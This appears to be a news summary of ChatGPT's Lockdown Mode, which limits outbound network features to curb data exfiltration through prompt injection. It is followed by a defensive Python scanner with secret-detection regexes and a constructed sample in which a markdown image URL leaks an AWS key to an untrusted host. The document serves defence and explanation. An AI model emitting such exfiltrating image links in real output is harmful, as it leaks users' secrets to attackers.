Overview
- OpenAI began rolling out Lockdown Mode in early June to eligible personal accounts and self‑serve ChatGPT Business subscriptions so users and workspace administrators can enable it from Settings.
- When enabled, Lockdown Mode disables or limits features that make outbound network requests, including live web browsing (limited to cached content only), Deep Research, Agent Mode, image retrieval/display, Canvas networking, and file downloads.
- OpenAI says the feature is meant as a last‑stage mitigation that lowers the chance an attacker can move stolen data off a session but does not stop prompt injections from appearing in content or guarantee complete prevention of exfiltration.
- The rollout includes account controls such as an Active Sessions manager and works with workspace admin controls so administrators can restrict app and connector actions for members using Lockdown Mode.
- Security researchers call the move a pragmatic but blunt tradeoff between safety and functionality and advise adding pre‑model scanners, secret scrubbing and tool‑result inspection to catch exfiltration attempts without disabling features entirely.
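
An added example (not code from OpenAI or the researchers cited) of the secret scrubbing and tool-result inspection named in the last point: it flags URLs in tool output that fall outside an allowlist and redacts secret-looking strings before the text reaches the model. The patterns, allowlist host, length cutoff and sample text are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed patterns and allowlist for illustration; tune to your own secret formats.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_header": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}
URL_RE = re.compile(r"https?://[^\s)\"'<>]+")
ALLOWED_HOSTS = {"docs.example.com"}   # hypothetical allowlist
MAX_PARAM_LEN = 64                     # assumed cutoff for an oversized query value

def scrub_secrets(text):
    """Replace secret-looking substrings; return (clean_text, names_of_patterns_hit)."""
    hits = []
    for name, pattern in SECRET_PATTERNS.items():
        text, count = pattern.subn(f"[REDACTED:{name}]", text)
        if count:
            hits.append(name)
    return text, hits

def inspect_tool_result(text):
    """Flag URLs in tool output that point off the allowlist and could carry data out."""
    findings = []
    for url in URL_RE.findall(text):
        parts = urlsplit(url)
        if (parts.hostname or "").lower() in ALLOWED_HOSTS:
            continue
        reasons = ["host not on allowlist"]
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if len(value) > MAX_PARAM_LEN:
                reasons.append(f"oversized query value in '{key}'")
            if any(p.search(value) for p in SECRET_PATTERNS.values()):
                reasons.append(f"secret pattern in '{key}'")
        findings.append({"url": url, "reasons": reasons})
    return findings

def gate(text):
    """Inspect the raw text first so secrets inside URLs are seen, then scrub it."""
    findings = inspect_tool_result(text)
    clean, secrets = scrub_secrets(text)
    return {"text": clean, "secrets": secrets, "findings": findings}

# Constructed tool output: one allowlisted link, one image URL carrying a key, one bare key.
SAMPLE = (
    "Setup guide: https://docs.example.com/guide\n"
    "![status](https://img.untrusted.example/p.png?d=AKIAIOSFODNN7EXAMPLE)\n"
    "export AWS_KEY=AKIAIOSFODNN7EXAMPLE\n"
)

if __name__ == "__main__":
    print(gate(SAMPLE))
```

Inspection runs before scrubbing so that a secret embedded in a URL is still reported as a finding rather than silently redacted.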